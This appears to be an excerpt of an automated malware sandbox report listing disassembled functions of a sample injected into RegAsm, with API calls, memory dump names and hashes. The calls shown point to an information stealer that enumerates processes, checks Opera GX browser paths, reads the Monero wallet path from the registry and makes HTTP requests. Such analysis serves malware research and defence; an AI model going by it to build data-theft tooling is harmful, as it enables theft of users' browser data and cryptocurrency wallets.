                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040EDAC
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040EDE7
                                                                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 0040EDF8
                                                                                                                                                                                                                                                              • Process32Next.KERNEL32(?,00000128), ref: 0040EE60
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000), ref: 0040EE6D
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 599723951-0
                                                                                                                                                                                                                                                              • Opcode ID: 5d7eb946d37dbae006d3382ced3585bc01facc56a2b5579cdf30aa957cf0788d
                                                                                                                                                                                                                                                              • Instruction ID: 442d2adc66867573a605d6bcc60739512b468c637e589a303a8df8f817b73186
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d7eb946d37dbae006d3382ced3585bc01facc56a2b5579cdf30aa957cf0788d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A214FB1A00118EBCB04EFA6DD45AEEBBB9EF88344F04446EF405F3290CB784A548B65
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004024B4
                                                                                                                                                                                                                                                                • Part of subcall function 00402420: memset.MSVCRT ref: 00402445
                                                                                                                                                                                                                                                                • Part of subcall function 00402420: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,00000014,00000000,00000000), ref: 0040246B
                                                                                                                                                                                                                                                                • Part of subcall function 00402420: CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,00000000,00000000,00000000), ref: 00402485
                                                                                                                                                                                                                                                              • strcat.MSVCRT(?,00000000,?,?,00000000,00000104,00000014), ref: 004024C9
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,00000014), ref: 004024D4
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,00000014), ref: 004024DB
                                                                                                                                                                                                                                                                • Part of subcall function 004022CC: ??_U@YAPAXI@Z.MSVCRT ref: 00402351
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00402504
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: memset$BinaryCryptHeapString$AllocateProcessstrcat
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3248666761-0
                                                                                                                                                                                                                                                              • Opcode ID: afdd7b3011673d52c96721e2c9069d36e8a2a3d42a33eac084e48a4c2f8877b8
                                                                                                                                                                                                                                                              • Instruction ID: 81291bc694c62cd0b743446bc76ae1be4e6ee0c4b5db74b158aaa1b3385ea87d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: afdd7b3011673d52c96721e2c9069d36e8a2a3d42a33eac084e48a4c2f8877b8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29F031B6D44118BBDB10A7A5DD0AFCA76BC9F14348F0000A6B945F2082D9B4AB948AA4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040CD23
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,Opera GX,00423BF6,00423BF3,?,?,?), ref: 0040CD6D
                                                                                                                                                                                                                                                                • Part of subcall function 0040F7A3: SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 0040F75F: _EH_prolog.MSVCRT ref: 0040F764
                                                                                                                                                                                                                                                                • Part of subcall function 0040F75F: GetFileAttributesA.KERNEL32(00000000,?,0040D11E,?,?,?,?), ref: 0040F778
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 0040B8F5: _EH_prolog.MSVCRT ref: 0040B8FA
                                                                                                                                                                                                                                                                • Part of subcall function 0040B8F5: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040B94D
                                                                                                                                                                                                                                                                • Part of subcall function 0040B8F5: memcmp.MSVCRT ref: 0040B98B
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                                                                              • String ID: #$Opera GX
                                                                                                                                                                                                                                                              • API String ID: 2375657845-1046280356
                                                                                                                                                                                                                                                              • Opcode ID: e6ca4ff080e8c7767d2566800a8342b4988c1732a71bf4c8c806a54797525b13
                                                                                                                                                                                                                                                              • Instruction ID: 34ed864e4e7d28deed13c865a2ed6ebf9a9f8fcae2343485183800af8996532d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6ca4ff080e8c7767d2566800a8342b4988c1732a71bf4c8c806a54797525b13
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C02707180124CEADF04EBE6D946ADEBBB8AF15308F14446EF801732C2DB785B18D766
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,?,?,?), ref: 1982FE03
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • winRead, xrefs: 1982FE3D
                                                                                                                                                                                                                                                              • delayed %dms for lock/sharing conflict at line %d, xrefs: 1982FE78
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                                                              • API String ID: 2738559852-1843600136
                                                                                                                                                                                                                                                              • Opcode ID: 33d3089d0ced1c0c3a78018415a74434008c12668a6f6ecb11f092e402bfc77c
                                                                                                                                                                                                                                                              • Instruction ID: d464d6a91c740b2fdf17120bf3be7633132930a1948dc29f6dbe10dc9efdb832
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33d3089d0ced1c0c3a78018415a74434008c12668a6f6ecb11f092e402bfc77c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 944104B26043456FC300DE68CD819ABB7A8FF88650FC8192DF945C7241E721E998CBA2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00411D77
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00411D94
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00411E58
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prologlstrlen
                                                                                                                                                                                                                                                              • String ID: ERROR
                                                                                                                                                                                                                                                              • API String ID: 2133942097-2861137601
                                                                                                                                                                                                                                                              • Opcode ID: 78b53590cb42131a73bc90ee9761f4be8f64d29eee803dc2d75c48913128bc46
                                                                                                                                                                                                                                                              • Instruction ID: d665764c68c2d683c75a42baa45f0e20be98dba9c60f49559ed6524b1d272c93
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78b53590cb42131a73bc90ee9761f4be8f64d29eee803dc2d75c48913128bc46
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB318571900148AFCB00EFAAD946ADD7FB4AF15318F10846EF905B7292D7389658C795
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00411A7C
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00404EF2: _EH_prolog.MSVCRT ref: 00404EF7
                                                                                                                                                                                                                                                                • Part of subcall function 00404EF2: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F5A
                                                                                                                                                                                                                                                                • Part of subcall function 00404EF2: StrCmpCA.SHLWAPI(?), ref: 00404F6E
                                                                                                                                                                                                                                                                • Part of subcall function 00404EF2: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404F91
                                                                                                                                                                                                                                                                • Part of subcall function 00404EF2: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FC7
                                                                                                                                                                                                                                                                • Part of subcall function 00404EF2: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404FEB
                                                                                                                                                                                                                                                                • Part of subcall function 00404EF2: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404FF6
                                                                                                                                                                                                                                                                • Part of subcall function 00404EF2: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405014
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00411ADA
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                                                                                              • String ID: ERROR$ERROR
                                                                                                                                                                                                                                                              • API String ID: 1120091252-2579291623
                                                                                                                                                                                                                                                              • Opcode ID: bbbad24492610d03f9cb6a343405c04e3a04baa2e778640e1f0c8b307578df75
                                                                                                                                                                                                                                                              • Instruction ID: c10f265733079788ce1beb020a6bc8157ba9384e6cd0facc98e36d473c363c30
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbbad24492610d03f9cb6a343405c04e3a04baa2e778640e1f0c8b307578df75
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD213D74904148EEDB00FFE6C556BDD7BB4AF14308F5044AEE945A3282DB78AB18C766
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00412F75
                                                                                                                                                                                                                                                                • Part of subcall function 00411EAC: _EH_prolog.MSVCRT ref: 00411EB1
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 00412FF9
                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prolog$CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2678630583-0
                                                                                                                                                                                                                                                              • Opcode ID: 298882296a7955a9a225d578641df3838ff13dc64488900d3e042fe5a5ecd721
                                                                                                                                                                                                                                                              • Instruction ID: 09c2a2700ced1d728891672dfd0f8811e0d164b67028549265d68e94afb5f6b6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 298882296a7955a9a225d578641df3838ff13dc64488900d3e042fe5a5ecd721
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A317376800248EFCB01DFE5C985ADD7BB8FF08314F10442EF806A3281DB789A89CB54
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401C88,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040108B
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00401C88,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401092
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401C88,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 004010AB
                                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401C88,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 004010C4
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3676486918-0
                                                                                                                                                                                                                                                              • Opcode ID: 62e1056c78a3f24023a1fdf72ed8deb6e8d96f8ef2f78eddac7b94d0e7f5f07d
                                                                                                                                                                                                                                                              • Instruction ID: 96c48622382358268536065744f297a8b6aaeb2530e943112dba2bcd85f22be7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62e1056c78a3f24023a1fdf72ed8deb6e8d96f8ef2f78eddac7b94d0e7f5f07d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5F03075640208FFDB145F91EC0AF9E7B7AEB44B00F104025FB01A61A0D7B19A119B64
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413A8A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004245CC), ref: 0040E8B2
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00413A8A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,004245CC,00000000,?), ref: 0040E8B9
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,00413A8A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040E8D7
                                                                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,00413A8A,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040E8F3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                              • String ID:
